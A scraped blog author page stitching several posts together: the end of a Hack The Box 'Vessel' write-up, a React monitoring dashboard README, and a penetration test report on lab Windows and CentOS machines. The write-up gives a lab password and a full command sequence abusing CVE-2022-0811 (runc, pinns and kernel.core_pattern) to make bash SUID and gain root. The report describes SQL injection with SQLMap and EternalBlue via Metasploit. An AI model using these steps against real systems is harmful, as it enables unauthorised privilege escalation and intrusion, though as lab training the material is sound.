Here is my password: b@mPRNSVTjjLKId1T
System Administrator
Ethan

Login as ethan to get the user flag

PE
Upload linpeas.sh and run, found the following info

-rwsr-x--- 1 root   ethan      796K Mar 15 18:18 /usr/bin/pinns (Unknown SUID binary)
[+] Checking if runc is available
[i] https://book.hacktricks.xyz/linux-unix/privilege-escalation/runc-privilege-escalation
runc was found in /usr/sbin/runc, you may be able to escalate privileges with it

With some google search, this is found to be related to a recent vulnerability: https://www.crowdstrike.com/blog/cr8escape-new-vulnerability-discovered-in-cri-o-container-engine-cve-2022-0811/

EXPLOITING CVE-2022–0811
Follow the steps closely, this is a confusing exploit
Note that there is no kubectl, minikube, docker etc involved in this exploit. You need to understand the concept of cve-2022–0811 and replicate using the underlying commands
Using pspy64, we can see that there are some scripts that keep deleting stuff in various folder. So i decided to do my exploit in /tmp/meow folder.

2022/08/31 05:28:01 CMD: UID=0    PID=53674  | sudo -u ethan rm -rf /home/ethan/*sh /home/ethan/.*sh /home/ethan/*/*.sh /home/ethan/*/*sh /home/ethan/.*/*sh /home/ethan/.*/.*sh
2022/08/31 05:28:01 CMD: UID=0    PID=53673  | /bin/sh /root/scripts/clean2.sh 
2022/08/31 05:28:01 CMD: UID=0    PID=53672  | /bin/sh -c /root/scripts/clean2.sh 
2022/08/31 05:28:01 CMD: UID=0    PID=53676  | /bin/bash /root/scripts/clean.sh 
2022/08/31 05:28:01 CMD: UID=0    PID=53679  | sudo -u steven rm -rf /home/steven/.notes/.*sh /home/steven/.notes/*sh 
2022/08/31 05:28:01 CMD: UID=1001 PID=53681  | rm -rf /home/steven/.notes/.*sh /home/steven/.notes/*sh 
2022/08/31 05:28:01 CMD: UID=0    PID=53682  | umount /home/ethan/utsns/* /home/ethan/ipcns/* /home/ethan/netns/* /home/ethan/cgroupns/* 
2022/08/31 05:28:01 CMD: UID=0    PID=53683  | umount /home/steven/utsns/* /home/steven/ipcns/* /home/steven/netns/* /home/steven/cgroupns/* 
2022/08/31 05:28:01 CMD: UID=0    PID=53685  | sudo -u ethan rm -rf /home/ethan/utsns /home/ethan/ipcns /home/ethan/netns /home/ethan/cgroupns 
2022/08/31 05:28:01 CMD: UID=1000 PID=53686  | 
2022/08/31 05:28:01 CMD: UID=0    PID=53687  | sudo -u steven rm -rf /home/steven/utsns /home/steven/ipcns /home/steven/netns /home/steven/cgroupns 
2022/08/31 05:28:01 CMD: UID=0    PID=53689  | sudo -u ethan rm /tmp/*.sh 
2022/08/31 05:28:01 CMD: UID=0    PID=53691  | /bin/sh /root/scripts/clean2.sh

Open two ssh sessions

STEP 1

In session 1, do the following

ethan@vessel:~$ mkdir /tmp/meow && cd /tmp/meow
ethan@vessel:/tmp/meow$ runc spec --rootless
ethan@vessel:/tmp/meow$ mkdir rootfs
ethan@vessel:/tmp/meow$ vi config.json 
############# under mounts section, add the following content
{
    "type": "bind",
    "source": "/",
    "destination": "/",
    "options": [
        "rbind",
        "rw",
        "rprivate"
    ]
},
#############
ethan@vessel:/tmp/meow$ runc --root /tmp/meow run alpine
# you should be in the container now, but this is a read-only filesystem

STEP 2

In session 2, create a script that adds the s bit to /usr/bin/bash

ethan@vessel:~$ echo -e '#!/bin/sh\nchmod +s /usr/bin/bash' > /tmp/meow/e.sh && chmod +x /tmp/meow/e.sh

STEP 3

In sesison 1, check the script is created and is executable

# ls -ls /tmp/meow
total 16
4 drwx--x--x 2 root root 4096 Aug 31 10:49 alpine
4 -rw-rw-r-- 1 root root 2875 Aug 31 10:49 config.json
4 -rwxrwxr-x 1 root root   33 Aug 31 10:50 e.sh
4 drwxrwxr-x 5 root root 4096 Aug 31 10:48 rootfs

STEP 4

In session 2, use pinns to assign the kernel.core_pattern a value so that upon a core dump, it will execute the malicious script

ethan@vessel:~$ pinns -d /var/run -f 844aa3c8-2c60-4245-a7df-9e26768ff303 -s 'kernel.shm_rmid_forced=1+kernel.core_pattern=|/tmp/meow/e.sh #' --ipc --net --uts --cgroup

STEP 5

In session 1, trigger a core dump

# ulimit -c unlimited
# tail -f /dev/null &
# ps
    PID TTY          TIME CMD
      1 pts/0    00:00:00 sh
     12 pts/0    00:00:00 tail
     13 pts/0    00:00:00 ps
# bash -i
bash: /root/.bashrc: Permission denied
root@runc:/# kill -SIGSEGV 12
root@runc:/# ps
    PID TTY          TIME CMD
      1 pts/0    00:00:00 sh
     14 pts/0    00:00:00 bash
     17 pts/0    00:00:00 ps

STEP 6

In session 2, check that the s bit has been assigned to usr/bin/bash, and then promote to effective root

ethan@vessel:~$ ls -ls /usr/bin/bash
1160 -rwsr-sr-x 1 root root 1183448 Apr 18 09:14 /usr/bin/bash
ethan@vessel:~$ bash -p
bash-5.0# cd /root
bash-5.0# cat root.txt

Dashboard for laptop monitoring!!!!

Muhammad Usman — Fri, 03 Mar 2023 16:13:27 +0000

CodeNinjaUsman / React-Monitor-

Cool dashboard for laptop monitoring

React monitor

Usage

This project was bootstrapped with Vite.

Project setup

npm install

Compiles and hot-reloads for development

npm run dev

Compiles and minifies for production

npm run build

Terms and License

Released under the GPL.
Use it for personal and commercial projects, but please don’t republish, redistribute, or resell the template.
Attribution is not required, although it is really appreciated.

View on GitHub

Project setup

npm install

Compiles and hot-reloads for development

npm run dev

Compiles and minifies for production

npm run build

Backend

Cpu info api

To save data in db

Api for recent changes in files

Run by

python watchdog_api.py C:\
python watchdog_flask.py
python cpu_monitor.py

Thanks..

Attribution is not required, although it is really appreciated. 🙏🙏

Hack a Machine

Muhammad Usman — Sun, 19 Feb 2023 09:20:41 +0000

Penetration Testing Report of Windows Desktop and CentOS Server

Link to machines

Setting up the Environment
The two machines were opened in VMWare. The Desktop machine appears to be a Windows-7 based system while the Server machine is a CentOS system as shown in the image below.

Scanning Phase
Tool Used: Angry IP Scanner
Scanning is a phase where we look for open ports in a system or a network. For this exercise, we scanned the entire network and found the CentOS server on IP address 192.168.10.10 along with its open ports. It is clearly evident that port 80 (for HTTP), port 22 (for SSH) and port 445 (for SMB) are open in the CentOS server. This means that a web application might be running on the server.

Checking the Server Web Application on Port 80
Since port 80 was open on the CentOS server as highlighted in the scanning phase, we therefore accessed the web application running there as shown in the image below. We made use of Firefox browser as it allows modifying the HTTP Requests which will be helpful in later stages.

Moreover, we inspected the page source in order to capture the POST request by supplying dummy data to the website. As depicted in the image below, we entered mbrown in the username field and sdsda in the password field. Although the password is wrong but capturing the POST request is important for launching further attacks.

Running SQLMap on Captured Post Requests
After capturing the POST Request, we launched SQLMap tool on that in order to harvest details about database, its tables, columns and fields as shown in the image below. SQL Map basically finds SQL injection vulnerabilities in web pages whereby a malicious SQL query when inserted on any user input field is passed on to the database and it fetches further information for the attacker. The web service running on CentOS server was found to be vulnerable for SQL injection attacks.

After getting the table details, SQLMap then shows the credentials as shown below.

Here, we can see that passwords for two accounts (Lora Brown and Matt Brown) are stored in an unencrypted form in the back-end database. Storing passwords in plaintext is not a recommended approach. They should be stored in the form of hashes. Moreover, the credentials for the Windows system are also stored here. Both machines got logged in using these credentials as shown below. This shows that the web application running on CentOS server is wide open for SQL injection attacks

Another utility of SQL injection attack is that that they do not generate persistence related issues in the victim system. Even in this case, the attack is persistent and stealthy because we are way above the Network layer of the TCP/IP protocol and no antivirus and firewall (if present) can guard against attacks on the Application layer of the TCP/IP protocol. That is the reason we chose such a persistent attack in order to get into the system, in the first place. This also speaks about the vulnerability in the implemented web application which should be patched to curtail injection attacks. Moreover, since the web application is running on port 80 and not 443, the entire session is insecure making the entire correspondence with the web application open for sniffers and eavesdroppers.

Issue with the Windows Operating System
While logging into the Windows machine, we found out that it is not running a genuine copy of the Operating System.

This means that the machine will not receive any official update, security patch or service pack update/upgrade, making it vulnerable to a wide variety of attacks. Moreover, using a counterfeit copy of a commercially licensed Operating System is not an acceptable act in many parts of the world.

HTTP TRACE Request on CentOS Web Server
Since attackers make use of TRACE Request method in HTTP requests in order to enumerate the website(s), therefore they should not be allowed. But that is not the case with the web service running on CentOS as it accepts the TRACE HTTP Request type. While using the Mozilla Firefox operating system, we first modified our HTTP request to the web service and replaced the GET Request Type with TRACE Request Type in order to see the website’s response, as shown in the figure below.

We noticed that the website gave some response to our TRACE request which was in ASCII as shown below.

When we converted this ASCII back into a readable form, we got the actual response website generated as a result of our TRACE request. Ideally, the website should block TRACE but it does not and that’s a vulnerability which would help any attacker fingerprint and/or enumerate the website.

HTTP TRACK Request on CentOS Web Server
Similarly, the website also responds to the TRACK HTTP Request method which is used by the attackers to debug the webserver connections. Ideally, it should be blocked but the web application does not block it and rather responds to such requests. The image below shows the HTTP 200 OK response to the TRACK Request. We again made use of Mozilla Firefox browser to modify the GET HTTP Request Type with TRACK HTTP Request Type.

Anonymous READ/WRITE in CentOS (SMB Vulnerability)
The SMB (Service Message Block) service on the CentOS server requires no authentication and anyone, even anonymous users can get Read and/or Write access on the remote machine as shown in the image below. The administrator has not set any security whatsoever in this regard. This vulnerability can lead to man in the middle attacks on the CentOS machine.

SMB Vulnerability in Windows Desktop Machine
Like the CentOS machine, the Windows machine was also vulnerable to the SMB vulnerability. The Windows machine is on the IP Address 192.168.10.20 and after scanning it was found out that the machine also has a remote code execution vulnerability in the SMB service as it is using the older version of SMB which has not been updated or patched and is hence vulnerable.

Eternal Blue Vulnerability in Windows Desktop
Due to the SMB vulnerability, the Windows system was exploited using the Eternal Blue exploit. Metasploit Framework was used on a Kali Linux machine for exploitation purpose as shown in the figures below. Metasploit is framework built-in the Kali Linux Operating System which contains all the payloads and exploit codes which are known and published. It can be used for learning and educational purposes. In the image below, we have set the target IP to that of the Windows machine (192.168.10.25) and the remote port to 445 on which the vulnerable SMB service is listening. This would build a persistent connection and presence on the victim system because it has the vulnerable version of SMB installed which would be unable to detect the payload as vulnerable.

The meterpreter session has opened which shows that the exploit has successfully executed on the remote Windows machine without getting detected, as shown below. Now since the session has been established, the remote system can be probed or fingerprinting in whatever way by providing commands from the Meterpreter terminal in Kali Linux.

Moreover, the following security policies need to be implemented on both systems.

Password Security and Management Policy to ensure that the passwords meet the minimum complexity criteria and are properly managed and secured and are not stored anywhere in plaintext.
Security Patching and Update Policy to ensure that the version of Operating System and other applications running on the system are updated and patched against known security vulnerabilities. This would evade all possibilities of attacks with known CVE numbers that are launched on vulnerable applications and services.
Web Security Policy to ensure that the web applications running on the system are secure, sanitize and validate incoming requests and do not make the backend database and host system vulnerable to malicious attackers who try compromising the website through crafted HTTP requests and injections
Software Procurement and Licensing Policy to ensure that the system is not running a counterfeit operating system but a genuine and licensed version of Windows.
Access Control and Authentication Policy to ensure that anonymous and un-privileged users do not get the admin or root privileges in the system and access levels are properly well defined and thoroughly implemented.

DEV Community: Muhammad Usman

TCP, UDP, and the Three-Way Handshake

Markdown: A simple guide

Basic Syntax

Headings

Text Styling

Lists

Links and Images

Conclusion

AVL Tree

Balance Factor

Python:

C++:

Complexities of Different Operations on an AVL Tree

AVL Tree Applications

Hashmaps

Definition

Implementation

Get Network Passwords

Linux

Windows

Train Url prediction

Processing

Training

Summary

The code can be found at Kaggle

Tree Structures

Definition:

Practical Usage

Example

Conclusion

Thank you....

HACKTHEBOX (HTB) WRITEUP: VESSEL [HARD]

Objectives

SCANNING

WEB ENUM

SOURCE CODE INSPECTION

BYPASS WEB LOGIN

OPENWEBANALYTICS

FOOTHOLD

REVERSE ENG

PE

EXPLOITING CVE-2022–0811

STEP 1

STEP 2

STEP 3

STEP 4

STEP 5

STEP 6

Dashboard for laptop monitoring!!!!

CodeNinjaUsman / React-Monitor-

Cool dashboard for laptop monitoring

React monitor

Usage

Project setup

Compiles and hot-reloads for development

Compiles and minifies for production

Terms and License

Project setup

Compiles and hot-reloads for development

Compiles and minifies for production

Backend

Cpu info api

To save data in db

Api for recent changes in files

Thanks..

Hack a Machine

Penetration Testing Report of Windows Desktop and CentOS Server